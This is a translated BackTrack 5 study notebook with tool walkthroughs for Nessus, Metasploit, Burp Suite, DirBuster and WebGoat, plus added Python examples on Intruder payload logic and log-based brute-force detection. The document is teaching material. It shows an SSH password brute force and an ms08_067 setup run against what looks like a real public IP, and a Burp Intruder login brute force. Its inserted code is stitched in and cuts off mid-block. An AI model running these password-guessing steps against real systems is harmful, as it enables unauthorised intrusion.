
BT5 Study Notes


BT5 Study Notes (document created: 2014-1-9)


www.learning-online.cn 百各安全 – focused on information security, dedicated to sharing timely, valuable material. Page 1 of 50


Contents

BT5 Study Notes
Installing BT5
  Downloading BT5
  Installation
Settings
  System time
  Enabling SSH
  Disabling the firewall
  Listing running services
  VMware network adapter settings
  IP address configuration
  Reboot
  Shutdown
Common tools
  Nmap
  Nessus
  Metasploit
    About penetration testing
    Starting
    Common commands
    SSH brute force
  Burp Suite
  W3af
  OWASP DirBuster
  WebGoat
    Starting (Windows)
    Problems
Glossary
  Cross-site scripting
  Directory browsing
  SQL injection
  HTTP Splitting
  zone transfer
Other
  Out of disk space
  Appendix
    HTTP response status codes
    Useful links
      BT official site
      cvedetails
      Metasploit Unleashed
      md5 online decryption
      owasp.org
      infosec
      URL Decoder/Encoder
      php charset encoder
      乌云网 (WooYun)
    Typical vulnerabilities
      3Com 3CDaemon 2.0 revision 10
  Afterword



Installing BT5
BT5 can be booted directly from the ISO into a live environment, or installed on a physical machine or in VMware. Because of software updates and some tools that require registration, installing on a physical machine or a VMware virtual machine is recommended. I installed it in VMware; the first time I gave the disk 5 GB and, to my surprise, it reported insufficient space, so I had to allocate 10 GB, with 1 GB of RAM.

Later I checked the official documentation: it recommends 20 GB of disk space and 2 GB of RAM.
Downloading BT5
Download the official image directly; it is about 1.8 GB. Images from other sources may have incorrect passwords or missing software. http://www.backtrack-linux.org/downloads/ Version selection (I chose BackTrack 5).

The downloaded file is roughly 1.8 GB. To be on the safe side, run an MD5 check after the download completes; normally nothing is wrong.



Installation
After booting from the burned disc or the mounted ISO, click the "install BackTrack" icon on the desktop and follow the wizard step by step.

The installer stuck at 99%: after about 25 minutes the progress bar dropped back to 73%, and after roughly another 5 minutes the installation finally completed (I tried the workaround found online of disconnecting the network adapter; it did not help).

After a reboot you can log in to the system.

Default username / password: root / toor

Settings
System time
View the time zone; here it shows +8, the time zone chosen when the system was installed:
root@bt:~# date -R
Fri, 10 Jan 2014 08:35:41 +0800
Show and change the system time:
root@bt:~# date
Fri Jan 10 08:36:55 CST 2014
Change it to 14:56:
root@bt:~# date -s 14:56
Fri Jan 10 14:56:00 CST 2014



Enabling SSH
Generate the SSH host keys: sshd-generate

Start the SSH service: /etc/init.d/ssh start

Connect with an SSH client (SecureCRT is used here).



Disabling the firewall
SSH connections appear to work by default; there is no need to disable a firewall.

Listing running services
root@bt:~# ps -ef

VMware network adapter settings
Choose according to your environment; I chose bridged mode.



IP address configuration
Manual IP configuration: here the IP address is set to 192.168.0.100.

Obtain an address automatically via DHCP: dhclient

Restart the network service: /etc/init.d/networking restart



Reboot
reboot

Shutdown
init 0



Common tools
Nmap

Nessus
Registration: http://www.tenable.com/products/nessus/nessus-plugins/obtain-an-activation-code  Select the Home registration.

Activation: ./nessus-fetch --register "<the activation code you applied for>"

Start:
root@bt:~# /etc/init.d/nessusd start
Starting Nessus : .
Log in: https://172.16.1.102:8834/ (localhost or the machine's own IP)
The program then initializes. Normally this is not very fast; when I initialized it, I had been at the login page for an hour and the progress bar was still cycling. It turned out to be a disk space problem; see the Out of disk space section for the fix.



The login screen finally appears.

Enter the username and password created during initialization to log in. Create a scan policy:

Fill in a policy name and keep the other defaults.



Keep the defaults.

Select plugins according to the type of scan; here I selected all plugins.



Keep the defaults.

Create a scan task

Enter the task name and select the scan policy.

The scan starts.


Scan complete.

Click download to save the report locally.

Metasploit
About penetration testing
The following is taken from the official documentation:

What is a penetration test? What is penetration testing?
Penetration testing, often called "pentesting", "pen testing", or "security testing", is the practice of attacking your own or your clients' IT systems in the same way a hacker would to identify security holes. Of course, you do this without actually harming the network. The person carrying out a penetration test is called a penetration tester or pentester. Let's make one thing crystal clear: Penetration testing requires that you get permission from the person who owns the system. Otherwise, you would be hacking the system, which is illegal in most countries – and trust me, you don't look good in an orange jump suit.

The difference between pentesting and hacking: a penetration test requires authorization from the system owner; hacking does not.

What is a vulnerability?
A vulnerability is a security hole in a piece of software, hardware or operating system that provides a potential angle to attack the system. A vulnerability can be as simple as weak passwords or as complex as buffer overflows or SQL injection vulnerabilities.

What is an exploit?
To take advantage of a vulnerability, you often need an exploit, a small and highly specialized computer program whose only reason for being is to take advantage of a specific vulnerability and to provide access to a computer system. Exploits often deliver a payload to the target system to grant the attacker access to the system. The Metasploit Project hosts the world's largest public database of quality-assured exploits. Have a look at our exploit database – it's right here on the site. Even the name Metasploit comes from the term "exploit". Metasploit was the first software to provide a common framework for a large selection of exploits. Think of it as an abstraction layer ("Meta") for exploits (abbreviated "sploits"). Get it?

What is a payload?
A payload is the piece of software that lets you control a computer system after it's been exploited. The payload is typically attached to and delivered by the exploit. Just imagine an exploit that carries the payload in its backpack when it breaks into the system and then leaves the backpack there. Yes, it's a corny description, but you get the picture. Metasploit's most popular payload is called Meterpreter, which enables you to do all sorts of funky stuff on the target system. For example, you can upload and download files from the system, take screenshots, and collect password hashes. You can even take over the screen, mouse, and keyboard to fully control the computer. If you're feeling particularly bad-ass, you can even turn on a laptop's webcam and be a fly on the wall.

Starting
In Metasploit, console mode is the most commonly used.


root@bt:/pentest/exploits/framework3# ./msfconsole
(metasploit ASCII-art banner)

       =[ metasploit v3.7.0-release [core:3.7 api:1.0]
+ -- --=[ 684 exploits - 355 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops

Version 3.7.0: 684 exploit modules, 355 auxiliary modules, 217 payloads, 27 encoders, 8 nops.

Common commands
View the help: ? or help
msf > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    back          Move back from the current context
    banner        Display an awesome metasploit banner
    cd            Change the current working directory
    color         Toggle color
    connect       Communicate with a host
    exit          Exit the console
    help          Help menu
    info          Displays information about one or more module
    irb           Drop into irb scripting mode
    jobs          Displays and manages jobs
    kill          Kill a job
    load          Load a framework plugin
    loadpath      Searches for and loads modules from a path

show
msf > show exploits

A simple classification of attacks. Exploits come in two kinds, active and passive:
Active exploit: attacks a vulnerability on the target host directly to gain control.
Passive exploit: listens and waits for the target host, then carries out the corresponding action.
Buffer overflow: when a program writes more data into a buffer than the buffer can hold, the excess overwrites the legitimate data next to it. Ideally the program checks the data length and refuses input longer than the buffer, but most programs assume the data length always matches the allocated storage, and that is what makes buffer overflows possible. The buffer area used by the operating system is also called the "stack". A buffer overflow can make a program fail, hang or reboot the system, and can also be used to execute unauthorized instructions and even gain system privileges.

msf > show payloads

Payloads are the shellcode, i.e. what is to be done once the vulnerability has been exploited. After the options are set, show payloads lists the payloads usable with the current exploit.
Naming rule: operating system/type/name, e.g. windows/dllinject/reverse_tcp
Main types:
shell: obtain a shell
dllinject: upload a DLL and inject it into a process
patchupxxx: patch the vulnerability
upexec: upload and execute a file
meterpreter: advanced payload
vncinject: advanced payload
passivex: advanced payload


Payload naming rules:
shell_find_tag: create a shell on an already established connection
shell_reverse_tcp: connect back to the attacker's host and create a shell
bind_tcp: listen for a TCP connection
reverse_tcp: connect back over TCP
reverse_http: communicate through an HTTP tunnel and create a new user added to the administrators group
xxx_ipv6_tcp: IPv6-based
xxx_nonx_tcp: for systems without No eXecute, or Windows 7 (NX is a CPU feature that can prevent buffer overflow exploitation)
xxx_ord_tcp: ordinal payload
xxx_tcp_allports: on all possible ports

search
msf > search ms08-067
[*] Searching loaded modules for pattern 'ms08-067'...

Exploits
========

   Name                         Disclosure Date  Rank   Description
   ----                         ---------------  ----   -----------
   windows/smb/ms08_067_netapi  2008-10-28       great  Microsoft Server Service Relative Path Stack Corruption

info
View the description.

Exploit naming rule: operating system/service/module, e.g. windows/smb/ms08_067_netapi here. rank indicates how reliable the module is (normal, good, great).

msf > info windows/smb/ms08_067_netapi

       Name: Microsoft Server Service Relative Path Stack Corruption
     Module: exploit/windows/smb/ms08_067_netapi
    Version: 12314
   Platform: Windows
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great

Provided by:
  hdm <hdm@metasploit.com>
  Brett Moore <brett.moore@insomniasec.com>
  staylor

Available targets:
  Id  Name
  --  ----
  0   Automatic Targeting
  1   Windows 2000 Universal
  2   Windows XP SP0/SP1 Universal
  3   Windows XP SP2 English (NX)
  4   Windows XP SP3 English (NX)
  5   Windows 2003 SP0 Universal
  6   Windows 2003 SP1 English (NO NX)
  7   Windows 2003 SP1 English (NX)
  8   Windows 2003 SP1 Japanese (NO NX)
  9   Windows 2003 SP2 English (NO NX)

use
Select the exploit:
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
View the options.

Options marked required must be set.
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

SSH brute force
Search for SSH-related modules; scanner/ssh/ssh_login is used here.
msf > search ssh
[*] Searching loaded modules for pattern 'ssh'...

Auxiliary
=========

   Name                             Disclosure Date  Rank    Description
   ----                             ---------------  ----    -----------
   fuzzers/ssh/ssh_kexinit_corrupt                   normal  SSH Key Exchange Init Corruption
   fuzzers/ssh/ssh_version_15                        normal  SSH 1.5 Version Fuzzer
   fuzzers/ssh/ssh_version_2                         normal  SSH 2.0 Version Fuzzer
   fuzzers/ssh/ssh_version_corrupt                   normal  SSH Version Corruption
   scanner/ssh/ssh_login                             normal  SSH Login Check Scanner
   scanner/ssh/ssh_login_pubkey                      normal  SSH Public Key Login

Select the module:
msf > use scanner/ssh/ssh_login
msf auxiliary(ssh_login) >

Set the parameters:
msf auxiliary(ssh_login) > set FILE_PASS /home/server_pass.txt
(the password file can be produced with a wordlist generator, or an existing password dictionary can be downloaded)
FILE_PASS => /home/server_pass.txt
msf auxiliary(ssh_login) > set RHOSTS 59.70.88.3     (set the target host)
RHOSTS => 59.70.88.3
msf auxiliary(ssh_login) > set STOP_ON_SUCCESS yes
STOP_ON_SUCCESS => yes
msf auxiliary(ssh_login) > set USERNAME root
USERNAME => root
msf auxiliary(ssh_login) > info

       Name: SSH Login Check Scanner
     Module: auxiliary/scanner/ssh/ssh_login
    Version: 11465
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  todb <todb@metasploit.com>

Basic options:
  Name              Current Setting  Required  Description
  ----              ---------------  --------  -----------
  BLANK_PASSWORDS   true             no        Try blank passwords for all users
  BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
  PASSWORD                           no        A specific password to authenticate with
  PASS_FILE                          no        File containing passwords, one per line
  RHOSTS            59.70.88.3       yes       The target address range or CIDR identifier
  RPORT             22               yes       The target port
  STOP_ON_SUCCESS   yes              yes       Stop guessing when a credential works for a host
  THREADS           1                yes       The number of concurrent threads
  USERNAME          root             no        A specific username to authenticate as
  USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
  USER_AS_PASS      true             no        Try the username as the password for all users
  USER_FILE                          no        File containing usernames, one per line
  VERBOSE           true             yes       Whether to print output for all attempts

Description:
  This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

References:
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0502

msf auxiliary(ssh_login) >

Note that the option listed under Basic options for the password file is PASS_FILE and still shows no value; the name set above, FILE_PASS, does not appear in the option list.

Start the brute force:
msf auxiliary(ssh_login) > exploit


[*] 59.70.88.3:22 - SSH - Starting buteforce
[*] 59.70.88.3:22 - SSH - Trying: username: 'root' with password: ''
[-] 59.70.88.3:22 - SSH - Failed: 'root':''
[*] 59.70.88.3:22 - SSH - Trying: username: 'root' with password: 'root'

Burp Suite
Burp Suite (free edition) is available by default in Backtrack 5. The professional edition can be downloaded from here. Some of the features that are not available in the free edition are Burp Scanner, Task Scheduler, Target Analyzer, etc.

BT5 ships the free edition of Burp Suite by default; the professional edition adds features such as the scanner, task scheduler and target analyzer.

Burp Suite is one of the best tools available for web application testing. Its wide variety of features helps us perform various tasks, from intercepting a request and modifying it on the fly, to scanning a web application for vulnerabilities, to brute forcing login forms, to performing a check for the randomness of session tokens and many other functions.

It is used for web application testing and performs many tasks: intercepting and modifying HTTP requests, scanning web applications for vulnerabilities, brute forcing, and so on. Brute forcing is the example used here.

Program path:
root@bt:/pentest/web/burpsuite# ls
burpsuite_v1.3.03.jar  readme - running burp.txt  suite.bat  terms and conditions.txt

The readme shows that burpsuite_v1.3.03.jar is an executable for a Java runtime; I transferred the file by FTP to a Windows machine and ran it there.

root@bt:/pentest/web/burpsuite# cat readme\ -\ running\ burp.txt
Burp Suite v1.3.03 by PortSwigger (mail@portswigger.net)
====================

Installation instructions
=========================
The Burp Suite program is an executable JAR (Java archive) file called burpsuite_v1.3.03.jar

Burp Suite requires a Java Runtime Environment, and will run on any platform for which a JRE is implemented. It requires Java version 1.5 or later, and it is recommended that the latest available JRE is used. JREs for Windows, Linux and Solaris can be obtained for free from http://java.sun.com/j2se/downloads.html

Burp Suite can be launched using the command "java -jar burpsuite_v1.3.03.jar". On some platforms, it can be launched simply by double-clicking on the JAR file.

Note that the default settings of the JRE Virtual Machine may limit the amount of system resources available to the Burp Suite process. If Burp Suite is to be used for tasks that require large amounts of memory, the VM memory settings should be changed. The file suite.bat launches Burp Suite with up to 512Mb of available memory. This file can be edited to specify a different memory size.

Java is a Trade Mark of Sun Microsystems, Inc.

Transfer the jar file to the Windows machine via FTP.

Start it with a 512 MB heap (with the default heap size it may not work properly):
C:\Documents and Settings\Administrator>java -jar -Xmx500m C:\Inetpub\ftproot\burpsuite_v1.3.03.jar

Startup screen



The functions of the individual modules:

1) Proxy - Burp Suite comes with a proxy, which runs on port 8080 by default. Using this proxy, we can intercept and modify the traffic as it flows from the client system to the web application. In order to use this proxy, we have to configure our browser to use this proxy. We can also drop the packets if we want so that they do not reach their intended destination, or redirect the traffic to a particular host, etc.
   Intercept HTTP requests by configuring a proxy in the browser, and manually manipulate the data in each request.

2) Spider - The spider feature of Burp Suite is used to crawl web applications looking for new links, content, etc. It automatically submits login forms (through user defined input) in case it finds any, and looks for new content from the responses. This information can then be sent to the Burp Scanner to perform a detailed scan on all the links and content provided by the spider.
   Collects the site's links and content and passes what it gathers to other modules for processing.

3) Scanner - It is used to scan web applications for vulnerabilities. The type of scanning can be passive, active or user-directed. Some false positives might occur during the tests. It is important to remember that no automated scanner is 100 percent accurate in its results. Unfortunately Burp Scanner is not available with the free edition that is included in Backtrack 5.
   Scans web applications for vulnerabilities; the free edition does not have this function.

4) Intruder - This feature can be used for various purposes like exploiting vulnerabilities, fuzzing web applications, carrying out brute force attacks etc.
   Exploiting vulnerabilities,

5) Repeater - This feature is used to modify and send the same request a number of times and analyze the responses in all those different cases.

6) Sequencer - This feature is mainly used to check the randomness of session tokens provided by the web application. It performs various advanced tests to figure this out.

7) Decoder - This feature can be used to decode data to get back the original form, or to encode and encrypt data.

8) Comparer - This feature is used to perform a comparison between any two requests, responses or any other form of data. This feature could be useful when comparing the responses with different inputs.

After starting, the proxy listener can be seen running normally.

Confirm that the "intercept is on" option is enabled.

Set the IE proxy.



Once the proxy is set, open IE and the intercepted HTTP request can be seen.

Open the page to be brute-forced, http://192.168.0.2/admin/Login.asp (the back-end login page of an ASP site package I downloaded). Click forward to pass the request on so that the login page appears.



Enter any username and password and click OK.

Burp has intercepted the submitted username and password.

Send the request to the Intruder module.



Switch to the Intruder module. The attack types are described as follows:

Sniper – This uses a single set of payloads. It targets each position in turn, and inserts each payload into that position in turn. Positions which are not targeted during a given request are not affected – the position markers are removed and any text which appears between them in the template remains unchanged. This attack type is useful for testing a number of data fields individually for a common vulnerability (i.e., cross-site scripting). The total number of requests generated in the attack is the product of the number of positions and the number of payloads in the payload set.

Battering ram – This uses a single set of payloads. It iterates through the payloads, and inserts the same payload into all of the defined positions at once. This attack type is useful where an attack requires the same input to be inserted in multiple places within the HTTP request (i.e., a username within the cookie header and within the message body). The total number of requests generated in the attack is the number of payloads in the payload set.

Pitchfork – This uses multiple payload sets. There is a different payload set for each defined position (up to a maximum of 8). The attack iterates through all payload sets simultaneously, and inserts one payload into each defined position. For example, the first request will insert the first payload from payload set 1 into position 1 and the first payload from payload set 2 into position 2. The second request will insert the second payload from payload set 1 into position 1 and the second payload from payload set 2 into position 2, and so on. This attack type is useful where an attack requires different but related input to be inserted in multiple places within the HTTP request (i.e., a username in one data field, and a known ID number corresponding to that username in another data field). The total number of requests generated by the attack is the number of payloads in the smallest payload set.

Cluster bomb – This uses multiple payload sets. There is a different payload set for each defined position (up to a maximum of 8). The attack iterates through each payload set in turn, so that all permutations of payload combinations are tested. For example, if there are two payload positions, the attack will place the first payload from payload set 1 into position 1, and iterate through all the payloads in payload set 2 in position 2; it will then place the second payload from payload set 1 into position 1, and iterate through all the payloads in payload set 2 in position 2. This attack type is useful where an attack requires different and unrelated input to be inserted in multiple places within the HTTP request (i.e., a username in one parameter, and an unknown password in another parameter). The total number of requests generated by the attack is the product of the number of payloads in all defined payload sets – this may be extremely large.

Change the attack type to cluster bomb.
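The four request-count rules quoted above are easy to misjudge once there are several positions and large payload sets, which matters on both sides: the tester sizing a run, and the defender deciding what an account-lockout or rate-limit threshold has to absorb. The following is an added example, not code from these notes or from Burp Suite; it re-implements the documented iteration order of each attack type over a constructed two-position template, and all names in it (`TEMPLATE`, `sniper`, `cluster_bomb`, and so on) are this example's own.

```python
"""Model of how Burp Intruder's four attack types combine payload sets.

Added example, not part of the original notes or of Burp Suite itself: it
re-implements the request-count rules quoted from the Burp documentation so
the size of an Intruder run can be worked out before anything is sent.  The
template and payload values are constructed for illustration.
"""
import math
from itertools import product
from typing import Dict, Iterator, List, Sequence

# Burp marks payload positions with section signs around the base value,
# e.g. username=§admin§&password=§secret§.  Here the request template is a
# list of (kind, text) segments: literal text, or a position whose text is
# the value that sits between the markers in the base request.
TEMPLATE: List = [
    ("lit", "username="), ("pos", "admin"),
    ("lit", "&password="), ("pos", "secret"),
]


def position_count(template: Sequence) -> int:
    return sum(1 for kind, _ in template if kind == "pos")


def render(template: Sequence, assignments: Dict[int, str]) -> str:
    """Build one request: targeted positions receive their payload, untargeted
    positions keep the base text (markers removed, text unchanged)."""
    parts, index = [], 0
    for kind, text in template:
        if kind == "pos":
            parts.append(assignments.get(index, text))
            index += 1
        else:
            parts.append(text)
    return "".join(parts)


def sniper(template: Sequence, payloads: Sequence[str]) -> Iterator[str]:
    """One payload set; each position in turn, each payload in turn."""
    for index in range(position_count(template)):
        for payload in payloads:
            yield render(template, {index: payload})


def battering_ram(template: Sequence, payloads: Sequence[str]) -> Iterator[str]:
    """One payload set; the same payload in every position at once."""
    positions = range(position_count(template))
    for payload in payloads:
        yield render(template, {i: payload for i in positions})


def pitchfork(template: Sequence, payload_sets: Sequence[Sequence[str]]) -> Iterator[str]:
    """One set per position, stepped in parallel; zip() stops at the smallest
    set, which is exactly the documented request count."""
    for combo in zip(*payload_sets):
        yield render(template, dict(enumerate(combo)))


def cluster_bomb(template: Sequence, payload_sets: Sequence[Sequence[str]]) -> Iterator[str]:
    """One set per position, every combination; product() varies the last set
    fastest, matching the iteration order the documentation describes."""
    for combo in product(*payload_sets):
        yield render(template, dict(enumerate(combo)))


def request_counts(n_positions: int, set_sizes: Sequence[int]) -> Dict[str, int]:
    """Closed-form request counts stated in the quoted documentation."""
    return {
        "sniper": n_positions * set_sizes[0],
        "battering ram": set_sizes[0],
        "pitchfork": min(set_sizes),
        "cluster bomb": math.prod(set_sizes),
    }


if __name__ == "__main__":
    set1, set2 = ["a", "b", "c"], ["1", "2"]
    runs = (("sniper", sniper(TEMPLATE, set1)),
            ("battering ram", battering_ram(TEMPLATE, set1)),
            ("pitchfork", pitchfork(TEMPLATE, [set1, set2])),
            ("cluster bomb", cluster_bomb(TEMPLATE, [set1, set2])))
    for name, gen in runs:
        requests = list(gen)
        print(f"{name:14} {len(requests):3} requests, first: {requests[0]}")
    print(request_counts(2, [3, 2]))
```

With two positions, a first set of three payloads and a second set of two, the generators produce 6, 3, 2 and 6 requests respectively, which agrees with the closed-form rules; for a real cluster-bomb run against a login form the product of the wordlist sizes is the number of failed logins the target will see.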

Remove the variables that are not needed and adjust the variable names.



Set the value for username (a fixed value is used in this example).

Set password (a password dictionary file is used here; click the load button to add it). The dictionary can be generated with a wordlist tool or downloaded ready-made from the internet.



After completing the settings, click the start attack button.

Click OK to dismiss the prompt.



Generally the entry whose length field differs from the rest is the correct password.

W3af
Web Application Attack and Audit Framework

- discovery plugins find new points of injection
- audit plugins find vulnerabilities
- grep plugins analyze all page content and find vulnerabilities on pages that are requested by other plugins
- exploit plugins [ab]use the vulnerabilities found in the audit phase and return something useful to the user (remote shell, SQL table dump, a proxy, etc.)
- output plugins are the way the framework and the plugins communicate with the user; output plugins save the data to a text or html file. Debugging information is also sent to the plugins and can be saved for analysis.
- mangle plugins are a way to modify requests and responses based on regular expressions, think "sed (stream editor) for the web".
- bruteforce plugins will bruteforce logins; they are actually part of the discovery phase.
- evasion plugins try to evade simple intrusion detection rules.

Program path:
root@bt:/pentest/web/w3af# ls
core  extlib  locales  plugins  profiles  readme  scripts  tools  w3af_console  w3af_gui
root@bt:/pentest/web/w3af#

w3af has both a console and a GUI interface; the console is used as the example here.
Start:
root@bt:/pentest/web/w3af# ./w3af_console
WARNING: No route found for IPv6 destination :: (no default route?)
w3af>>>
View the program help: help

OWASP DirBuster
Program path: root@bt:/pentest/web/dirbuster



BT provides a jar version; I downloaded the Windows version instead. It is a tool for brute-forcing website directory names: https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project

The test site is again used as the example; its real directory structure is as follows:

To save time, I chose to brute-force directory names only.



Scan results after 5 minutes:

As can be seen, the success rate is quite high.
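Both guessing runs shown in these notes, the ssh_login module trying one user against a password list in the Metasploit section and the DirBuster run above requesting directory names that mostly do not exist, leave the same kind of trace on the target: a burst of failures from a single source in a short time. The following is an added example, not code from these notes or from Metasploit or DirBuster, that finds such bursts in two constructed log samples, one in sshd's syslog format and one in Apache's combined log format. The log lines, the thresholds (`SSH_THRESHOLD`, `WEB_404_THRESHOLD`, `WINDOW_SECONDS`) and all function names are this example's own assumptions.

```python
"""Detect the traces left by the two guessing runs described in these notes.

Added example, not from the original notes or from Metasploit, DirBuster or
any other tool they describe.  Both runs appear on the target as a burst of
failures from one source.  Log lines are constructed here in sshd's syslog
format and Apache's combined log format; thresholds are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List

WINDOW_SECONDS = 60     # assumed: look for bursts inside one minute
SSH_THRESHOLD = 5       # assumed: failed passwords from one source per window
WEB_404_THRESHOLD = 8   # assumed: 404s from one source per window

SSHD_FAIL = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+)")
HTTP_LINE = re.compile(
    r'^(?P<ip>[\d.]+) \S+ \S+ \[(?P<ts>[^\]]+)\] "[^"]*" (?P<status>\d{3}) ')

# Constructed sample: one source hammering root, one legitimate key login,
# one stray failure from elsewhere.
AUTH_LOG = """\
Jan 10 14:56:01 bt sshd[2101]: Failed password for root from 192.0.2.10 port 40122 ssh2
Jan 10 14:56:01 bt sshd[2103]: Failed password for root from 192.0.2.10 port 40124 ssh2
Jan 10 14:56:02 bt sshd[2105]: Failed password for root from 192.0.2.10 port 40126 ssh2
Jan 10 14:56:02 bt sshd[2107]: Failed password for root from 192.0.2.10 port 40128 ssh2
Jan 10 14:56:03 bt sshd[2109]: Failed password for root from 192.0.2.10 port 40130 ssh2
Jan 10 14:56:03 bt sshd[2111]: Failed password for root from 192.0.2.10 port 40132 ssh2
Jan 10 14:57:10 bt sshd[2200]: Accepted publickey for admin from 192.0.2.44 port 51000 ssh2
Jan 10 14:58:00 bt sshd[2210]: Failed password for invalid user test from 198.51.100.7 port 3333 ssh2
"""

# Constructed sample: one source probing directory names, one normal visitor
# with a single broken image link.
ACCESS_LOG = """\
192.0.2.77 - - [10/Jan/2014:15:01:00 +0800] "GET /admin/ HTTP/1.1" 200 1532
192.0.2.77 - - [10/Jan/2014:15:01:00 +0800] "GET /backup/ HTTP/1.1" 404 210
192.0.2.77 - - [10/Jan/2014:15:01:01 +0800] "GET /test/ HTTP/1.1" 404 210
192.0.2.77 - - [10/Jan/2014:15:01:01 +0800] "GET /old/ HTTP/1.1" 404 210
192.0.2.77 - - [10/Jan/2014:15:01:02 +0800] "GET /tmp/ HTTP/1.1" 404 210
192.0.2.77 - - [10/Jan/2014:15:01:02 +0800] "GET /data/ HTTP/1.1" 404 210
192.0.2.77 - - [10/Jan/2014:15:01:03 +0800] "GET /db/ HTTP/1.1" 404 210
192.0.2.77 - - [10/Jan/2014:15:01:03 +0800] "GET /cgi-bin/ HTTP/1.1" 404 210
192.0.2.77 - - [10/Jan/2014:15:01:04 +0800] "GET /upload/ HTTP/1.1" 404 210
203.0.113.5 - - [10/Jan/2014:15:01:30 +0800] "GET /index.asp HTTP/1.1" 200 4021
203.0.113.5 - - [10/Jan/2014:15:01:31 +0800] "GET /images/logo.gif HTTP/1.1" 404 210
"""


def max_in_window(times: List[datetime], window: int) -> int:
    """Largest number of events from one source inside any `window` seconds
    (two-pointer sweep over the sorted timestamps)."""
    times = sorted(times)
    best = start = 0
    for end, t in enumerate(times):
        while (t - times[start]).total_seconds() > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def flag_bursts(events: Dict[str, List[datetime]], threshold: int,
                window: int) -> Dict[str, int]:
    """Return {source: peak count} for every source at or over the threshold."""
    flagged = {}
    for source, times in events.items():
        peak = max_in_window(times, window)
        if peak >= threshold:
            flagged[source] = peak
    return flagged


def ssh_guessing_sources(log: str, year: int = 2014) -> Dict[str, int]:
    """Sources with a burst of sshd password failures.  syslog lines carry no
    year, so the caller supplies it."""
    failures = defaultdict(list)
    for line in log.splitlines():
        m = SSHD_FAIL.match(line)
        if m:
            failures[m["ip"]].append(
                datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S"))
    return flag_bursts(failures, SSH_THRESHOLD, WINDOW_SECONDS)


def dir_guessing_sources(log: str) -> Dict[str, int]:
    """Sources with a burst of 404s, the footprint of directory guessing."""
    misses = defaultdict(list)
    for line in log.splitlines():
        m = HTTP_LINE.match(line)
        if m and m["status"] == "404":
            misses[m["ip"]].append(
                datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"))
    return flag_bursts(misses, WEB_404_THRESHOLD, WINDOW_SECONDS)


if __name__ == "__main__":
    print("ssh guessing:", ssh_guessing_sources(AUTH_LOG))
    print("dir guessing:", dir_guessing_sources(ACCESS_LOG))
```

On the samples, 192.0.2.10 is reported with six password failures in one window and 192.0.2.77 with eight 404s, while the single stray failure and the visitor with one broken image link stay below threshold. The sliding window rather than a plain per-day count is what keeps a slow, legitimate trickle of typos from tripping the rule.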


WebGoat
WebGoat is a deliberately insecure web application maintained by OWASP designed to teach web application security lessons. You can install and practice with WebGoat in either J2EE (this page) or [WebGoat for .Net] in ASP.NET. In each lesson, users must demonstrate their understanding of a security issue by exploiting a real vulnerability in the WebGoat applications. For example, in one of the lessons the user must use SQL injection to steal fake credit card numbers. The application is a realistic teaching environment, providing users with hints and code to further explain the lesson.

WebGoat is a web application environment containing many vulnerabilities that can be used as a lab environment for learning web application security; it runs under J2EE or ASP.NET.

Why the name "WebGoat"? Developers should not feel bad about not knowing security. Even the best programmers make security errors. What they need is a scapegoat, right? Just blame it on the 'Goat!

Download: https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project

Starting (Windows)
Directory listing after extraction:

1. Download the WebGoat-5.X-OWASP_Standard_Win32.zip file from: http://code.google.com/p/webgoat/downloads/list
2. Unzip the file
3. Double click webgoat.bat
4. Browse to http://localhost/WebGoat/attack

Before starting, make sure port 80 is not already in use by another application on the machine.
Default username and password: webgoat/webgoat


Problems
WebScarab cannot capture traffic when WebGoat and WebScarab are deployed on the same host

If your WebGoat and WebScarab are deployed on the same host, you will find that WebScarab does not capture WebGoat's HTTP requests. The fix is as follows (IE settings are used as the example; Chrome was tested and does not have this problem). The IE proxy settings are as follows (at this point requests to sites other than localhost are already captured normally):

Change the WebGoat address from http://localhost/WebGoat/attack to http://localhost./WebGoat/attack

Note the dot added after localhost. This is not a WebScarab bug but an unfortunate design decision by the IE developers: if IE decides that the server you are trying to reach is on the local machine, it ignores all proxy settings. One way to trick it is to append a dot to the hostname.

Bypass a Path Based Access Control Scheme

When I reached this lesson I was capturing with WebScarab for the first time; after clicking view file I could not capture the physical path of the file no matter what I tried. It turned out I had chosen the wrong category; the correct setting is shown below. If unsure, select everything.



Glossary
Cross-site scripting
XSS, also written CSS (Cross Site Script), is cross-site scripting: a malicious attacker inserts malicious HTML code into a web page, and when a user browses that page the HTML code embedded in it is executed, achieving the malicious user's particular goal.

Directory browsing

SQL injection

HTTP Splitting
HTTP Splitting (or HTTP Response Splitting) is a method of attacking web applications by exploiting poor input validation and by taking advantage of the HTTP protocol. HTTP Splitting occurs when an attacker inputs arbitrary headers to control the server response. It can be used to deliver many attack payloads such as web cache poisoning, XSS, hijacking the page data, and other client side attacks. http://evilzone.org/tutorials/http-splitting/
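The "poor input validation" in that definition is concrete enough to show in code. The following is an added example, not from these notes or the linked tutorial: a response builder that copies a user-supplied redirect target into the Location header without checking it, the same builder with the check that stops a CR LF sequence from ending the header line early, and a small parser that reads the result the way a proxy or cache would, so the header that the application never set becomes visible. The constructed inputs, the `HeaderInjection` exception and every function name are this example's own.

```python
"""HTTP response splitting: the header-building defect and its fix.

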